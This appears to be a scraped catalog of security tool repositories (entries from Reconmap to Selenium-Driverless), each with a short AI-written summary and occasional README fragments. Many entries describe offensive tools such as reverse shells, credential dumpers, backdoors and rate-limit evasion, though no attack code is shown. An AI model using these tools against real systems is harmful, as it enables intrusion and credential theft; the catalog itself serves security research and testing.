AI Summary: Reconmap is an open-source penetration testing management and automation platform that aids security professionals throughout the engagement lifecycle by efficiently planning, executing, and reporting on security assessments. Its notable features include real-time execution and scheduling of security commands, automated output capture, vulnerability tracking, and the generation of professional reports in multiple formats, all aimed at streamlining workflows and enhancing collaboration among InfoSec teams.

README

Reconmap

Reconnoitre

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Reconnoitre is a reconnaissance tool designed for automating information gathering and service enumeration tailored for OSCP labs. Its primary use case involves creating a structured directory for storing results, findings, and recommended commands for each target host while offering features like DNS and SNMP sweeps, service scanning, and virtual host discovery using customizable wordlists. The tool emphasizes ease of use and flexibility, allowing users to execute tailored reconnaissance operations efficiently.

ReconPi

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ReconPi is a lightweight reconnaissance tool designed for extensive domain analysis and asset discovery using a Raspberry Pi or a VPS. Its primary functionality includes resolving domain names, subdomain enumeration, vulnerability scanning using Nmap, and integrating tools like Nuclei for template-based security assessments. Notable features include automated reporting, Slack notifications, and easy installation through a straightforward script, making it accessible for cyber reconnaissance tasks.

README

Recon Pi

__________ __________.__ \______ \ ____ ____ ____ ____\______ \__| | _// __ \_/ ___\/ _ \ / \| ___/ | | | \ ___/\ \__( <_> ) | \ | | | |____|_ /\___ >\___ >____/|___| /____| |__| \/ \/ \/ \/ v2.2 - @x1m_martijn
ReconPi - A lightweight recon tool that performs extensive reconnaissance with the latest tools using a Raspberry Pi.

RecoverPy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: RecoverPy is a data recovery tool that scans raw disk partitions to recover deleted files by directly inspecting disk blocks and searching for specific byte patterns. Designed primarily for forensic data recovery, it allows users to navigate adjacent blocks to retrieve fragmented data while ensuring that the entire scanning process is memory-efficient and focused solely on raw data, without attempting any filesystem interpretations. Notably, it facilitates efficient block inspection and content extraction, though success depends on the integrity of the underlying disk blocks.

Red-Baron

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Red Baron is a Terraform-based framework designed to automate the deployment of secure, resilient, and disposable infrastructure tailored for Red Team operations. This tool offers several pre-compiled custom and third-party Terraform providers to facilitate infrastructure setup on various cloud platforms. Notably, it integrates easily with services like Linode and GoDaddy, enhancing the agility and efficiency of infrastructure management for penetration testing scenarios.

README

Latest version of this project is now being maintained here:

Red-Team-Infrastructure-Wiki

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Red Team Infrastructure Wiki provides comprehensive guidance for establishing a robust and resilient Red Team infrastructure, aimed at enhancing operational effectiveness in adversarial engagements. Notable features include detailed design considerations for functional segregation, integration of redirectors for obscured communication, and streamlined deployment strategies for phishing and command and control (C2) operations. This resource is particularly valuable for enhancing agility against defensive measures during long-term engagements and during active incident responses.

Red-Teaming-Toolkit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Red Teaming Toolkit is an open-source collection of security tools designed to facilitate adversary simulation and enhance threat hunting capabilities. It features various tools organized by categories including reconnaissance, initial access, and lateral movement, providing functionalities such as port scanning, OSINT gathering, and credential dumping. The toolkit serves both security practitioners aiming to test network defenses and those looking to improve detection and prevention mechanisms against potential threats.

redamon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: RedAmon is an autonomous AI framework designed for seamless cybersecurity operations that integrate reconnaissance, exploitation, and post-exploitation processes into a streamlined pipeline. It stands out by automatically triaging findings, applying code fixes, and generating pull requests in repositories, ensuring human oversight at critical junctures. Its notable features include support for over 38 security tools, integration with major vulnerability scanners, and configurable autonomy to adapt to various security assessment needs.

REDasm

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: REDasm is a cross-platform disassembler designed for both hobbyists and professional reverse engineers, featuring a modern codebase and a user-friendly Qt frontend. It supports C++ and Python 3 plugins, multithreaded analysis, and various binary formats including Portable Executable and ELF, while providing capabilities like binary lifting and intermediate language analysis. The underlying architecture, driven by LibREDasm, allows for extensive customization and the addition of new languages.

README

Features | Compile | Reddit | Twitter | Telegram

REDasm is a cross platform disassembler with a modern codebase useful from the hobbyist to the professional reverse engineer.
All features are provided by LibREDasm which loads plugins developed in C, C++ and Python3 (you can also support new languages if you want!) and an user friendly Qt frontend.
LibREDasm also provides a plain C API for maximum ABI compatibility along with a C++17 core.

Tested on Windows and Linux.

REDRIVER2

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: REDRIVER2 is a reverse-engineered reimplementation of the original game, translating MIPS code back to C without emulation, and significantly enhancing it beyond the original PlayStation version. The tool supports modding with replacement of textures and models, runs on multiple platforms including Windows and Linux, and integrates a custom porting layer based on the Psy-X emulator. It utilizes advanced reverse engineering methods, including debugging symbols and semi-automatic decompilation techniques to achieve a fully playable game experience.

redsnarf

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: RedSnarf is a penetration testing and red team tool designed for the extraction of hashes and credentials from Windows environments, including workstations, servers, and domain controllers, utilizing operationally safe techniques. Key features include the retrieval of local SAM hashes, enumeration of users with elevated privileges, and capabilities for hash spraying, LSASS dumps, and remote management functions like enabling/disabling RDP and clearing event logs. The tool focuses on efficient credential collection and strengthening post-exploitation analysis while maintaining a low profile during operations.

RedTeam-Tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: RedTeam-Tools is a comprehensive repository containing over 150 tools and resources specifically designed for red teaming activities, encompassing both targeted tools and general-purpose utilities adaptable for offensive operations. Notable features include a variety of specialized tips for advanced red team techniques, as well as tools for reconnaissance, exploitation, and post-exploitation, catering to a wide range of attack vectors and methodologies. This collection serves as both a practical toolkit and an educational resource for those engaged in offensive cybersecurity practices.

RedTeaming-Tactics-and-Techniques

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: This repository contains personal notes focused on red teaming and offensive security, emphasizing practical experiments with various penetration testing techniques and tools in a controlled lab environment. It covers a range of methodologies, including code execution, defense evasion, and lateral movement, while aiming to enhance understanding of cyber attacks and malware development. Notable features include a commitment to referencing other researchers’ work and a critical approach to self-learning through experimentation and documentation.

reentrancy-attacks

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “reentrancy-attacks” repository provides a comprehensive historical collection of reentrancy attack incidents on smart contracts. It categorizes various types of attacks, including single-function and cross-chain reentrancy, and includes detailed timelines, victim contracts, and exploit transactions for notable cases. This tool serves as a reference for understanding and analyzing reentrancy vulnerabilities in blockchain applications.

README

⚔️ A Historical Collection of Reentrancy Attacks

📌 Definition of a Reentrancy Attack

refinery

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Binary Refinery is a command-line toolkit designed for the transformation of binary data, focusing on malware triage analysis through various scripts that handle tasks like compression and encryption. It enables users to create flexible processing pipelines by chaining scripts with the piping operator. Key features include the ability to read from stdin and write to stdout, extensive documentation accessible via command-line help, and an emphasis on modular units that perform singular tasks efficiently.

reFlutter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: reFlutter is a framework designed for the reverse engineering of Flutter applications by utilizing a modified version of the Flutter library, enabling dynamic analysis and convenient app repacking. Notable features include traffic monitoring and interception capabilities through a patched socket.cc, modifications to display code structure information, and support for manual code changes via a custom Dockerfile. This tool allows users to bypass certain certificate pinning implementations and does not require root access for Android devices, streamlining the app analysis process.

reko

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Reko is a general-purpose decompiler designed to analyze machine code binaries. It supports various processor architectures and executable formats, providing users with command-line, Windows GUI, and ASP.NET front ends for inputting individual binaries or project files. Notable features include a core decompiler engine that facilitates minimal user intervention during decompilation and extensive support for different file formats, all maintained under the GNU General Public License.

README

reko - a general purpose decompiler.

Reloaded-II

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Reloaded II is a universal mod loader and mod management framework developed in C#, designed for use with x86 and x64 native games. Its primary use case is enabling DLL injection for modding capabilities, offering a comprehensive toolkit for modding various games. Notable features include full open-source access and a focus on extensibility for user-contributed enhancements and documentation.

README

Reloaded II

Nothing else matters.
Universal, C# based mod loader.
Works with anything X86, X64.

Introduction

[Reloaded II] is a universal DLL injection based Mod Loader and Mod Management Framework.

remote-method-guesser

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The remote-method-guesser (rmg) is a Java RMI vulnerability scanner designed to identify and verify common security vulnerabilities on Java RMI endpoints. It features practical examples, including servers that facilitate testing for standard RMI services, SSRF attacks, and Spring Remoting integration, making it a valuable tool for penetration testers and security researchers. The tool’s compatibility with Docker allows for efficient setup and execution of security assessments in isolated environments.

rengine

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: reNgine is a comprehensive web reconnaissance and vulnerability scanning tool aimed at security professionals, penetration testers, and bug bounty hunters. It features a highly configurable engine, data correlation capabilities, continuous monitoring, and a database-backed reconnaissance system, with the latest update including enhancements like a bounty hub integration, subdomain enumeration tools, and customizable reporting templates. This tool streamlines the reconnaissance process, enhancing efficiency and effectiveness in identifying vulnerabilities across web applications.

requests-ip-rotator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: requests-ip-rotator is a Python library designed to leverage AWS API Gateway’s extensive IP pool to generate numerous unique IP addresses for web scraping and brute forcing, enabling users to circumvent IP-based rate limits. The tool automatically randomizes the X-Forwarded-For headers to obscure the client’s true IP while allowing for easy integration with the requests library. Notably, it offers both manual and automatic gateway management methods for user convenience, along with cost-effective usage under AWS’s free tier.

resolvers

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Resolvers is an extensive repository of validated DNS resolvers designed for use in DNS enumeration tasks, catering primarily to security professionals and penetration testers. The tool offers various lists, including a simple resolver list, an extended version with detailed metadata about each resolver, and a selection of trusted resolvers from reputable organizations like Cloudflare and Google. Notably, it employs a robust validation process using multiple instances of dnsvalidator to ensure the reliability of the resolver data, which is continuously updated through community contributions.

Resources-for-Beginner-Bug-Bounty-Hunters

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Resources-for-Beginner-Bug-Bounty-Hunters” repository serves as a comprehensive guide for individuals entering the realm of web hacking and bug bounty hunting. It features a curated selection of tools, tips, and resources aimed at enhancing the skills of both novice and experienced hunters, with notable sections on vulnerability types, testing environments, and coding resources. Additionally, the repository includes links to educational courses and community engagement platforms to foster learning and collaboration.

ret-sync

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ret-sync is a synchronization tool designed for reverse engineering, enabling the integration of various debugging environments (WinDbg, GDB, LLDB, etc.) with static analysis disassemblers (IDA, Ghidra, Binary Ninja). Its primary use case is to facilitate a seamless analysis workflow by synchronizing debugger states with disassembler views, allowing for real-time insights during dynamic analysis while providing the broader context from static analysis. Notable features include on-the-fly address rebasing, support for multiple simultaneous sessions across different systems, and the ability to pass contextual information between debug and disassembly tools.

retoolkit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Retoolkit is a comprehensive suite designed for reverse engineering and malware analysis on x86 and x64 Windows systems, providing users with an easy setup of essential tools. Notable features include a pre-configured environment for popular applications such as x64dbg, streamlined access via desktop shortcuts or context menus, and support for command-line operations from any directory. This toolkit is particularly advantageous for quickly establishing a new analysis virtual machine.

retrowrite

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Retrowrite is a static binary rewriter designed for x64 and aarch64 architectures, enabling the insertion of instrumentation into binaries without the need for source code, thereby supporting use cases in fuzzing and sanitization. The tool employs the symbolization technique to ensure zero overhead during binary rewriting and includes features such as AFL-coverage and ASan instrumentation, along with a variant (KRetrowrite) specifically for rewriting Linux kernel modules. Different algorithms and supported features are available for the x64 and arm64 versions, accommodating various binary types and compiler specifications.

revanced-patcher

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ReVanced Patcher is a comprehensive library designed for patching Android applications, facilitating the modification of Dalvik VM bytecode and APK resources. It serves as the foundational component for other ReVanced tools such as ReVanced Manager and ReVanced CLI, enabling users to create customized patches through an extensive patch repository. Notable features include the ability to disassemble and reassemble Dalvik bytecode, along with resource decoding capabilities.

README

Continuing the legacy of Vanced

revanced-patches-template

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ReVanced Patches Template is a foundational repository designed to facilitate the creation of new ReVanced Patches repositories. Its primary use case is to allow developers to implement and share multiple patches to modify existing applications effectively, leveraging patches from various sources. Notable features include a configurable build setup and collaborative capabilities that enable integration of diverse patches.

README

Continuing the legacy of Vanced

reverse_ssh

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Reverse SSH is a tool designed for establishing reverse shells using SSH, enabling secure connections for remote management and file transfer. Its primary use case revolves around providing a reliable method for accessing and controlling remote systems, featuring capabilities such as dynamic port forwarding, native SCP/SFTP support, and multiple network transports like HTTP and TLS. Notable features include mutual client-server authentication, a full Windows shell experience, and advanced functionalities like fileless execution and built-in HTTP server capabilities for dynamic client generation.

reverse-linear-sync-engine

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Reverse Engineering Linear’s Sync Engine” project provides an in-depth analysis of Linear’s Sync Engine (LSE), aimed at enhancing collaborative software applications through an intuitive and efficient synchronization solution. Its primary use case is to support real-time collaboration by managing edits while offering critical features like partial syncing, permission controls, and offline availability, all wrapped in a developer-friendly API. The project emphasizes the balance of complexity and usability, highlighting LSE’s adaptability for various data models without requiring extensive expertise in sync technologies.

reverse-shell

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: reverse-shell is a tool that facilitates setting up reverse shells on Unix-like systems, primarily intended for penetration testing and educational purposes. It automatically detects the target’s available software to execute the appropriate payload, enabling users to bypass firewalls and gain remote shell access effortlessly. Notable features include ease of use with commands for listening and executing reverse shells, options for reconnecting after disconnection, and the ability to run in the background to avoid detection.

reverse-ssh

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ReverseSSH is a lightweight, statically-linked SSH server designed for establishing reverse connections, primarily useful for remote access during CTFs and penetration tests like the OSCP exam. It offers fully interactive shell access, file transfer through SFTP, and supports various port forwarding options, making it a versatile tool for bridging initial access with privilege escalation on target systems running Unix or Windows. Notable features include its compact size of less than 1.5MB and compatibility with both operating systems, enhancing its utility in diverse environments.

ReverseAPK

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ReverseAPK is a tool designed for the analysis and reverse engineering of Android applications, enabling users to quickly decompile APK files into Java and Smali formats. Its notable features include static source code analysis to identify common vulnerabilities, automatic extraction of files, and comprehensive evaluation of the AndroidManifest.xml for security risks associated with application behavior.

README

ReverseAPK

Credits: @xer0dayz

Website: https://sn1persecurity.com

Version: 1.2

ABOUT:

Quickly analyze and reverse engineer Android applications.

reversinglabs-yara-rules

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The ReversingLabs YARA Rules repository provides a collection of high-quality YARA detection rules designed for threat hunters and incident responders to enhance threat detection capabilities within their environments. These rules emphasize precision and minimal false positives, utilizing clearly defined byte patterns and conditions to target unique malware functionalities. Continuous testing against a vast array of binaries ensures the rules maintain their effectiveness across various security solutions, particularly when integrated with the ReversingLabs Titanium Platform.

RigelEngine

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Rigel Engine is a modern re-implementation of the classic game Duke Nukem II, enabling it to run natively on today’s operating systems while maintaining compatibility with the original game’s data files. Its key features include widescreen support, improved graphics and performance with smooth scrolling, quick save functionality, enhanced controller support, and extended modding capabilities, all achieved through reverse engineering due to the absence of the original source code. The tool is stable and supports multiple platforms, including Windows, Linux, and macOS, with minimal system requirements.

RMS-Runtime-Mobile-Security

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Runtime Mobile Security (RMS) is a web-based interface that leverages FRIDA to facilitate real-time manipulation of Android and iOS applications. Its primary use case includes dumping loaded classes and methods, hooking functionality on-the-fly, and tracing method arguments and return values. Notable features encompass the ability to load custom scripts and comprehensive support for both Android and iOS platforms, making it a versatile tool for mobile security analysis and testing.

robin

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Robin is an AI-powered OSINT tool designed for conducting investigations on the dark web, utilizing language models to enhance query refinement and result filtering from various dark web search engines. Its notable features include modular architecture for easy integration of new components, multi-model support for flexible AI interactions, a Streamlit-based web UI for user-friendly navigation, and robust reporting capabilities to save investigation outputs. It is recommended to be deployed using Docker for isolated and efficient operation.

ronin

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ronin is an open-source Ruby toolkit designed for security research and development, featuring a comprehensive suite of CLI commands and libraries tailored for various security tasks such as data encoding/decoding, vulnerability scanning, fuzzing, and reconnaissance. Notable features include a fully-loaded Ruby REPL, a lightweight web UI for database interaction, and the ability to install and run third-party exploits or payloads. This tool is primarily used by security researchers, bug bounty hunters, and developers for efficient data processing and rapid script prototyping.

RootMyTV.github.io

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: RootMyTV is an exploit tool designed for rooting or jailbreaking LG webOS smart TVs, primarily facilitating the installation of the webOS Homebrew Channel with elevated privileges. Notable features include its user-friendly interface and detailed instructions for exploiting unpatched webOS versions, enabling users to run third-party applications on their TVs. However, due to LG’s security updates, the tool is unlikely to work on models with firmware released after mid-2022.

ROPgadget

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ROPgadget is a tool designed to facilitate Return-Oriented Programming (ROP) exploitation by allowing users to search for gadgets within binary files. It supports multiple file formats (ELF, PE, Mach-O, Raw) and architectures (x86, x64, ARM, ARM64, MIPS, PowerPC, Sparc, RISC-V 64) and employs the Capstone disassembler for efficient gadget identification. Notable features include customizable search parameters, ROP chain generation, and support for various opcode and string searching capabilities.

ruler

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ruler is a remote interaction tool designed for Exchange servers, exploiting MAPI/HTTP and RPC/HTTP protocols to manipulate Outlook features for shell access. Its primary use case includes enumerating valid users, creating malicious mail rules, and executing VBScript via Outlook forms or home pages. Notable features include the ability to leverage the Autodiscover service for efficient interaction and a variety of built-in functions for customized exploitation.

README

Introduction

Ruler is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. The main aim is abuse the client-side Outlook features and gain a shell remotely.

rustcat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Rustcat is a versatile port listener and reverse shell utility compatible with Linux, MacOS, and Windows, designed to simplify remote command execution. Notable features include an interactive mode with command history, tab completion, and CTRL-C blocking, which enhance user experience during shell operations. It provides two primary modes of operation: listening for incoming connections and establishing reverse shells for remote system access.

README

rustcat - The modern port listener and reverse shell

RustHound

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: RustHound is a cross-platform BloodHound collector tool developed in Rust, designed to generate data about users, groups, computers, OUs, GPOs, and containers for analysis within BloodHound. It operates silently without detection by antivirus software and is suitable for environments where SharpHound is blocked or incompatible. Notable features include its ability to run on Linux, Windows, and macOS, along with a range of compile options, including Docker support and static binary generation.

RustRedOps

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: RustRedOps is a collection of Red Team operation tools developed in Rust, aimed at enhancing the capabilities of security professionals and penetration testers in conducting security assessments and intrusion tests. Notable features include a diverse set of projects focused on techniques such as API hooking, anti-analysis, process enumeration, and various forms of code injection, which collectively facilitate advanced exploitation tactics and malware development. The repository emphasizes efficiency and effectiveness, making it a valuable resource for practitioners in cybersecurity.

RustScan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: RustScan is an advanced port scanner designed for high-speed operation, capable of scanning all 65,000 ports in just 3 seconds. Its notable features include a flexible scripting engine that supports Python, Lua, and Shell for automated processing, as well as adaptive learning capabilities that enhance its performance over time, making it a highly effective tool for network security assessments.

README

➡️ Discord | Installation Guide | Usage Guide ⬅️

rz-ghidra

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: rz-ghidra is an integration of the Ghidra decompiler and Sleigh disassembler specifically designed for the Rizin framework. This plugin allows users to decompile functions, output various formats such as XML and JSON, and customize settings for decompilation in a self-contained manner without requiring the full Ghidra suite. Notable features include seamless integration with Rizin, side-by-side decompilation views, and extensive configurability through various parameters for enhanced user experience.

README

rz-ghidra

This is an integration of the Ghidra decompiler and Sleigh Disassembler for Rizin. It is solely based on the decompiler part of Ghidra, which is written entirely in C++, so Ghidra itself is not required at all and the plugin can be built self-contained. This project was presented, initially for radare2, at r2con 2019 as part of the Cutter talk: https://youtu.be/eHtMiezr7l8?t=950

saas-attacks

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The SaaS Attacks repository provides a structured collection of attack techniques tailored for Software-as-a-Service (SaaS) platforms, aimed at aiding security researchers, penetration testers, and red/blue teams. Notable features include an emphasis on “networkless” attacks devoid of traditional endpoint interactions, and a matrix inspired by the MITRE ATT&CK framework focusing specifically on SaaS-based threats. This resource is designed to facilitate knowledge sharing and collaboration in the identification and mitigation of SaaS vulnerabilities.

Sandman

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Sandman is a backdoor designed for use during red team engagements, specifically tailored to operate on hardened networks by leveraging the NTP protocol to retrieve and execute arbitrary shellcode from a designated server. Notable features include the ability to spoof legitimate IP addresses for NTP, execute as a standalone C# application, and the flexibility to function across various operating systems including Windows and Linux, enhancing its covert capabilities in security assessments.

sandmap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: sandmap is a reconnaissance tool that enhances the capabilities of the Nmap engine, providing a simplified command line interface for automating and expediting network and system scanning processes. It offers 31 modules with 459 predefined scan profiles, support for the Nmap Scripting Engine (NSE), and integration with TOR for enhanced privacy during scans, allowing users to execute multiple scans simultaneously.

README

sandmap

Description • How To Use • Command Line • Configuration • Requirements • Other • Contributing • License • Wiki

SatIntel

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SatIntel is an OSINT tool designed for satellite reconnaissance, built with Golang. It enables users to extract satellite telemetry, receive orbital predictions, and parse Two Line Elements (TLE) using a command-line interface that integrates with APIs from Space Track and N2YO. Notable features include satellite catalog retrieval, telemetry display, visual and radio orbital predictions, and user-friendly authentication through environmental variables.

README

SatIntel

. . . . . . . . . . . . ________ . ///////// . . . . . . . ________ . . ///////// . . |.____. /\ ///////// . . . . . // \/ |\ ///////// // \ | \ ///////// _______ _______ _______ _____ __ _ _______ _______ . || | | ///////// . . |______ |_____| | | | \ | | |______ | . || | |// ///// ______| | | | __|__ | \_| | |______ |_____ . \\ / // \/ . \\.___./ //\ ,_\ . . . . . \ //////\ / \ . . Satellite OSINT CLI Tool . . . ///////// \| | . . ///////// . \ __ / . Made by Angelina Tsuboi (G4LXY) . . ///////// . . . . . ///////// . . . . . . -------- . .. . . . . . . . . .
SatIntel is a OSINT tool for satellite reconnaissance made with Golang. The tool can extract satellite telemetry, receive orbital predictions, and parse TLEs.

Features

Satellite Catalog Retrieval from NORAD ID or Selection Menu

Display Satellite Telemetry

Visual and Radio Orbital Predictions

Parse Two Line Elements (TLE)

Preview

Usage

Make an account at Space Track save username and password.

scan4all

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: scan4all is a versatile cybersecurity tool designed for automated web scanning and vulnerability detection, integrating various tools such as vscan, nuclei, and subfinder. It supports a wide range of protocols for password blasting and includes built-in detection capabilities for over 15,000 proof-of-concept (PoC) exploits. Built on Golang, it is cross-platform, lightweight, customizable, and features intelligent scanning mechanisms that optimize performance while ensuring comprehensive coverage of vulnerabilities.

README

💬

Scanners-Box

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Scanners Box is a comprehensive hacker toolkit that consolidates over 335 open-source scanners across various categories, such as subdomain enumeration, SQL injection vulnerability detection, and malware detection. The tool is designed for modular vulnerability assessment and does not include well-known scanning tools like Nmap or Metasploit, focusing instead on specialized scanning capabilities. Notable features include AI-powered autonomous scanners, dynamic and static code analysis, and comprehensive scanning for web applications and IoT devices.

scapy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Scapy is a versatile Python-based tool for interactive packet manipulation that allows users to forge, decode, and analyze packets across various network protocols. Its primary use cases include network scanning, tracerouting, and custom packet crafting, enabling complex tasks such as VLAN hopping and ARP cache poisoning. Notable features include extensive protocol support, intuitive shell interaction, and the ability to easily integrate into automated tests and attacks, making it a comprehensive option for cybersecurity professionals.

Scavenger

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Scavenger is an OSINT bot designed to search for sensitive data leaks on paste sites, specifically targeting credentials, private keys, configuration files, and other sensitive information. It features customizable search terms, two operational modes (scraping archives and tracking users), and the ability to scan local folders for sensitive data. The bot effectively organizes crawled pastes into different directories based on detection outcomes, facilitating efficient data management.

README

Scavenger - OSINT Bot - REWORKED

bot in action

SchemaCrawler

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Free database schema discovery and comprehension tool

Free database schema discovery and comprehension tool

schemaspy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SchemaSpy is a database metadata analysis tool designed for visualizing and understanding data models through HTML-based reports and entity-relationship diagrams. It supports over a dozen database types via JDBC drivers and can be executed as a standalone application or through Maven, making it versatile for database administrators and developers. Notable features include easy navigation of data schemas and the ability to generate comprehensive documentation of database structures.

README

scilla

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Scilla is an information gathering tool designed for DNS, subdomains, ports, and directories enumeration. Its primary use case is for penetration testing, providing capabilities for extensive reconnaissance on target domains. Notable features include customizable wordlists for subdomain and directory enumeration, multiple output formats, and ease of installation through various methods such as Homebrew, Snap, and Docker.

README

🏴‍☠️ Information Gathering tool 🏴‍☠️ - DNS / Subdomains / Ports / Directories enumeration

_{Coded with 💙 by edoardottt}
Share on Twitter!

ScopeSentry

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Scope Sentry is a versatile cybersecurity tool that provides functionalities such as asset mapping, subdomain enumeration, vulnerability scanning, and information leakage detection. Its primary use case is to facilitate comprehensive security assessments of web assets through a distributed scanning approach, allowing users to configure multiple scanning nodes. Notably, it features a plugin system for extensibility, supports multi-node scanning, and includes components for web monitoring and sensitive data leakage detection.

Search-That-Hash

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Search-That-Hash is a hash cracking automation tool that quickly queries popular online hash databases and utilizes Hashcat for local cracking when offline. It features automatic type identification through integration with Name-That-Hash, a fast search capability, extensibility for adding new hash sources, and an accessible design. Additionally, the tool offers both CLI and JSON API outputs, ensuring flexibility in usage for security professionals.

README

➡️ Discord ⬅️

The Fastest Hash Cracking System
pip3 install search-that-hash && sth

SecretScanner

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Deepfence SecretScanner is a standalone tool designed to identify unprotected secrets, such as API keys and passwords, within container images and file systems. It matches content against a comprehensive database of approximately 140 secret types, outputting detailed findings in JSON format. Furthermore, SecretScanner can be integrated into the ThreatMapper platform, allowing for holistic vulnerability scanning and risk assessment in cloud-native applications.

README

SecretScanner

SecretScanner

Deepfence SecretScanner can find unprotected secrets in container images or file systems.

sectemplates

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SecTemplates is a resource repository designed for infosec professionals and engineering teams lacking dedicated security personnel, providing templates for various security programs such as bug bounties, incident response, and vulnerability management. The tool offers structured starting points including checklists, runbooks, and document templates, facilitating the establishment and scaling of security initiatives while maintaining neutrality towards specific vendors. Content is freely available for personal and commercial use, barring resale in other products.

security

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “security” repository serves as a compilation of security research and writing contributions by the author, highlighting vulnerabilities across various software platforms including Vim, Chrome, and Firefox. Its primary use case is to document security issues and provide insights via detailed write-ups and analysis, particularly related to Capture The Flag (CTF) challenges. Notable features include links to CVEs, write-ups of specific vulnerabilities, and a collection of past security issues relevant to major web browsers.

security-study-plan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Jassics Security Study Plan repository provides a comprehensive roadmap for aspiring cybersecurity engineers, covering various roles such as penetration testing, application security, cloud security, and DevSecOps. It offers structured study plans that include both free and paid resources, tools, and key concepts necessary to excel in the field. Notable features include detailed plans for specialized areas like AWS, GCP, and threat modeling, along with common skills assessments to help learners gauge their progress.

security-tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: security-tools is a collection of small security utilities developed in Python and Bash, aimed at assisting CTF competitors, bug bounty hunters, penetration testers, and developers. The primary use case is to facilitate various security tasks and streamline the testing process. Notable features include a diverse range of tools tailored for different security challenges and scenarios.

README

security-tools

Small security related tools created in Python and Bash for CTF players, bug bounty hunters, pentesters and developers.

securityonion

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Security Onion 2.4 is an open-source Linux distribution for intrusion detection, network monitoring, and log management. Its primary use case is to provide security operations teams with tools to detect and respond to threats through features such as alert management, detailed dashboards, and packet capture (PCAP) capabilities. Notable functionalities include a hunting interface, customizable detection rules, and comprehensive configuration options, facilitating a proactive approach to cybersecurity.

README

Security Onion 2.4

Security Onion 2.4 is here!

see

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Sandboxed Execution Environment (SEE) is a framework designed for automating tests in secure environments utilizing customizable sandboxes through libvirt. It supports various hypervisors, including QEMU and VirtualBox, and enables modular test platforms by allowing plugin integration for enhanced event-based interaction. Ideal for isolating and managing the execution of potentially dangerous or unstable software, SEE facilitates both quick prototyping and production-level testing.

README

Sandboxed Execution Environment

:Source: https://github.com/F-Secure/see :Documentation: https://see.readthedocs.io :Download: https://pypi.python.org/pypi/python-see

seekr

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Seekr is a multi-purpose toolkit designed for gathering and managing Open Source Intelligence (OSINT) data, featuring a streamlined web interface for data collection, organization, and analysis. Key functionalities include integration with popular OSINT tools, account discovery, customizable themes, and the absence of API keys for any features, making it suitable for researchers and investigators seeking to enhance their OSINT workflows. It is currently in beta development and allows for easy setup on various platforms including Windows, Linux, and Docker.

Selenium-Driverless

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Selenium-Driverless is a Python package that enables web automation using Selenium without the need for a chromedriver, allowing for interactions with sites that commonly employ anti-bot mechanisms like Cloudflare. Its notable features include support for multiple tabs and incognito contexts, proxy authentication, and network interception, making it suitable for use cases that require more advanced browser automation scenarios while maintaining anonymity. The tool is designed primarily for non-commercial use and provides integration with asyncio for asynchronous operations.

server

